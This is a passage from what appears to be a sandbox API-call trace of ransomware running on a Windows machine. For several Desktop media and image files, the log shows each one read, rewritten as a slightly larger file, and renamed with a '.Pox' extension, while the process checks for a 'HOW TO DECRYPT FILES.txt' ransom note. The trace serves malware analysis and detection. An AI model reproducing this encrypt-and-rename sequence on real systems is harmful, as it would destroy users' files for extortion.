ftLastAccessTime.dwHighDateTime=0x1d4cb2b, ftLastWriteTime.dwLowDateTime=0x289e25c0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x16860)) returned 1 [0037.643] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0037.643] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\m4SvX-jeGXwW.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\m4svx-jegxww.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\m4SvX-jeGXwW.mkv.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\m4svx-jegxww.mkv.pox")) returned 1 [0037.644] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\O0y0hsLAoKxoA.mp3", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\O0y0hsLAoKxoA.mp3", lpFilePart=0x0) returned 0x37 [0037.644] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0037.644] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\O0y0hsLAoKxoA.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o0y0hslaokxoa.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0037.644] GetFileType (hFile=0x26c) returned 0x1 [0037.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0037.645] GetFileType (hFile=0x26c) returned 0x1 [0037.645] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x6d32 [0037.645] ReadFile (in: hFile=0x26c, lpBuffer=0x25ae8e0, nNumberOfBytesToRead=0x6d32, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x25ae8e0*, lpNumberOfBytesRead=0x3ae570*=0x6d32, lpOverlapped=0x0) returned 1 [0037.645] CloseHandle (hObject=0x26c) returned 1 [0037.695] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0037.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0037.695] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0037.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0037.695] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\O0y0hsLAoKxoA.mp3", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\O0y0hsLAoKxoA.mp3", lpFilePart=0x0) returned 0x37 [0037.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0037.695] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\O0y0hsLAoKxoA.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o0y0hslaokxoa.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0037.696] GetFileType (hFile=0x26c) returned 0x1 [0037.696] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0037.697] GetFileType (hFile=0x26c) returned 0x1 [0037.697] WriteFile (in: hFile=0x26c, lpBuffer=0x2424c44*, nNumberOfBytesToWrite=0x6d40, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x2424c44*, lpNumberOfBytesWritten=0x3ae564*=0x6d40, lpOverlapped=0x0) returned 1 [0037.698] CloseHandle (hObject=0x26c) returned 1 [0037.699] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\O0y0hsLAoKxoA.mp3", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\O0y0hsLAoKxoA.mp3", lpFilePart=0x0) returned 0x37 [0037.699] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\O0y0hsLAoKxoA.mp3.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\O0y0hsLAoKxoA.mp3.Pox", lpFilePart=0x0) returned 0x3b [0037.699] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0037.699] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\O0y0hsLAoKxoA.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o0y0hslaokxoa.mp3"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcddf5a90, ftCreationTime.dwHighDateTime=0x1d4ce8b, ftLastAccessTime.dwLowDateTime=0x5c6f7bf0, ftLastAccessTime.dwHighDateTime=0x1d4d3d2, ftLastWriteTime.dwLowDateTime=0x28a7ab40, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x6d40)) returned 1 [0037.699] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0037.699] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\O0y0hsLAoKxoA.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o0y0hslaokxoa.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\O0y0hsLAoKxoA.mp3.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o0y0hslaokxoa.mp3.pox")) returned 1 [0037.700] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sN3K33tDMKQaoIqJe.mp4", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sN3K33tDMKQaoIqJe.mp4", lpFilePart=0x0) returned 0x3b [0037.700] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0037.700] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sN3K33tDMKQaoIqJe.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sn3k33tdmkqaoiqje.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0037.701] GetFileType (hFile=0x26c) returned 0x1 [0037.701] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0037.701] GetFileType (hFile=0x26c) returned 0x1 [0037.701] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x5c9e [0037.701] ReadFile (in: hFile=0x26c, lpBuffer=0x242bf00, nNumberOfBytesToRead=0x5c9e, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x242bf00*, lpNumberOfBytesRead=0x3ae570*=0x5c9e, lpOverlapped=0x0) returned 1 [0037.701] CloseHandle (hObject=0x26c) returned 1 [0037.715] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0037.715] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0037.715] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0037.715] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0037.715] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sN3K33tDMKQaoIqJe.mp4", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sN3K33tDMKQaoIqJe.mp4", lpFilePart=0x0) returned 0x3b [0037.716] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0037.716] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sN3K33tDMKQaoIqJe.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sn3k33tdmkqaoiqje.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0037.718] GetFileType (hFile=0x26c) returned 0x1 [0037.718] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0037.718] GetFileType (hFile=0x26c) returned 0x1 [0037.718] WriteFile (in: hFile=0x26c, lpBuffer=0x2495d68*, nNumberOfBytesToWrite=0x5ca0, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x2495d68*, lpNumberOfBytesWritten=0x3ae564*=0x5ca0, lpOverlapped=0x0) returned 1 [0037.719] CloseHandle (hObject=0x26c) returned 1 [0037.720] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sN3K33tDMKQaoIqJe.mp4", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sN3K33tDMKQaoIqJe.mp4", lpFilePart=0x0) returned 0x3b [0037.720] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sN3K33tDMKQaoIqJe.mp4.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sN3K33tDMKQaoIqJe.mp4.Pox", lpFilePart=0x0) returned 0x3f [0037.720] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0037.720] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sN3K33tDMKQaoIqJe.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sn3k33tdmkqaoiqje.mp4"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24e9870, ftCreationTime.dwHighDateTime=0x1d4d2a5, ftLastAccessTime.dwLowDateTime=0x1bf10c20, ftLastAccessTime.dwHighDateTime=0x1d4d502, ftLastWriteTime.dwLowDateTime=0x28aa0ca0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x5ca0)) returned 1 [0037.720] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0037.720] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sN3K33tDMKQaoIqJe.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sn3k33tdmkqaoiqje.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sN3K33tDMKQaoIqJe.mp4.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sn3k33tdmkqaoiqje.mp4.pox")) returned 1 [0037.743] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wcRE.jpg", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wcRE.jpg", lpFilePart=0x0) returned 0x2e [0037.743] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0037.743] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wcRE.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wcre.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0037.743] GetFileType (hFile=0x26c) returned 0x1 [0037.743] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0037.743] GetFileType (hFile=0x26c) returned 0x1 [0037.743] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x139da [0037.743] ReadFile (in: hFile=0x26c, lpBuffer=0x249bf7c, nNumberOfBytesToRead=0x139da, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x249bf7c*, lpNumberOfBytesRead=0x3ae570*=0x139da, lpOverlapped=0x0) returned 1 [0037.743] CloseHandle (hObject=0x26c) returned 1 [0037.760] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0037.760] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0037.760] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0037.760] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0037.760] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wcRE.jpg", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wcRE.jpg", lpFilePart=0x0) returned 0x2e [0037.760] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0037.761] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wcRE.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wcre.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0037.776] GetFileType (hFile=0x26c) returned 0x1 [0037.776] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0037.776] GetFileType (hFile=0x26c) returned 0x1 [0037.776] WriteFile (in: hFile=0x26c, lpBuffer=0x2523b1c*, nNumberOfBytesToWrite=0x139e0, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x2523b1c*, lpNumberOfBytesWritten=0x3ae564*=0x139e0, lpOverlapped=0x0) returned 1 [0037.778] CloseHandle (hObject=0x26c) returned 1 [0037.779] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wcRE.jpg", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wcRE.jpg", lpFilePart=0x0) returned 0x2e [0037.779] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wcRE.jpg.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wcRE.jpg.Pox", lpFilePart=0x0) returned 0x32 [0037.780] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0037.780] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wcRE.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wcre.jpg"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaa03290, ftCreationTime.dwHighDateTime=0x1d4d118, ftLastAccessTime.dwLowDateTime=0x3abf6060, ftLastAccessTime.dwHighDateTime=0x1d4c69e, ftLastWriteTime.dwLowDateTime=0x28b39220, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x139e0)) returned 1 [0037.780] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0037.780] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wcRE.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wcre.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wcRE.jpg.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wcre.jpg.pox")) returned 1 [0037.781] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XRPTN7Kw.png", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XRPTN7Kw.png", lpFilePart=0x0) returned 0x32 [0037.781] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0037.781] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XRPTN7Kw.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xrptn7kw.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0037.781] GetFileType (hFile=0x26c) returned 0x1 [0037.781] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0037.781] GetFileType (hFile=0x26c) returned 0x1 [0037.781] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0xb618 [0037.781] ReadFile (in: hFile=0x26c, lpBuffer=0x25379f0, nNumberOfBytesToRead=0xb618, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x25379f0*, lpNumberOfBytesRead=0x3ae570*=0xb618, lpOverlapped=0x0) returned 1 [0037.781] CloseHandle (hObject=0x26c) returned 1 [0037.797] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0037.797] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0037.797] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0037.797] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0037.797] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XRPTN7Kw.png", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XRPTN7Kw.png", lpFilePart=0x0) returned 0x32 [0037.797] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0037.797] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XRPTN7Kw.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xrptn7kw.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0037.798] GetFileType (hFile=0x26c) returned 0x1 [0037.798] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0037.799] GetFileType (hFile=0x26c) returned 0x1 [0037.799] WriteFile (in: hFile=0x26c, lpBuffer=0x25a6a4c*, nNumberOfBytesToWrite=0xb620, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x25a6a4c*, lpNumberOfBytesWritten=0x3ae564*=0xb620, lpOverlapped=0x0) returned 1 [0037.800] CloseHandle (hObject=0x26c) returned 1 [0037.801] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XRPTN7Kw.png", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XRPTN7Kw.png", lpFilePart=0x0) returned 0x32 [0037.801] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XRPTN7Kw.png.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XRPTN7Kw.png.Pox", lpFilePart=0x0) returned 0x36 [0037.801] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0037.801] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XRPTN7Kw.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xrptn7kw.png"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d01ce90, ftCreationTime.dwHighDateTime=0x1d4d54b, ftLastAccessTime.dwLowDateTime=0x7107d870, ftLastAccessTime.dwHighDateTime=0x1d4d23b, ftLastWriteTime.dwLowDateTime=0x28b5f380, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0xb620)) returned 1 [0037.801] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0037.801] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XRPTN7Kw.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xrptn7kw.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XRPTN7Kw.png.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xrptn7kw.png.pox")) returned 1 [0037.803] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yjbKOP66PA6 t9xa78.bmp", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yjbKOP66PA6 t9xa78.bmp", lpFilePart=0x0) returned 0x3c [0037.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0037.803] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yjbKOP66PA6 t9xa78.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yjbkop66pa6 t9xa78.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0037.803] GetFileType (hFile=0x26c) returned 0x1 [0037.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0037.803] GetFileType (hFile=0x26c) returned 0x1 [0037.803] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0xaf75 [0037.803] ReadFile (in: hFile=0x26c, lpBuffer=0x25b25b0, nNumberOfBytesToRead=0xaf75, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x25b25b0*, lpNumberOfBytesRead=0x3ae570*=0xaf75, lpOverlapped=0x0) returned 1 [0037.804] CloseHandle (hObject=0x26c) returned 1 [0037.858] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0037.858] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0037.858] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, 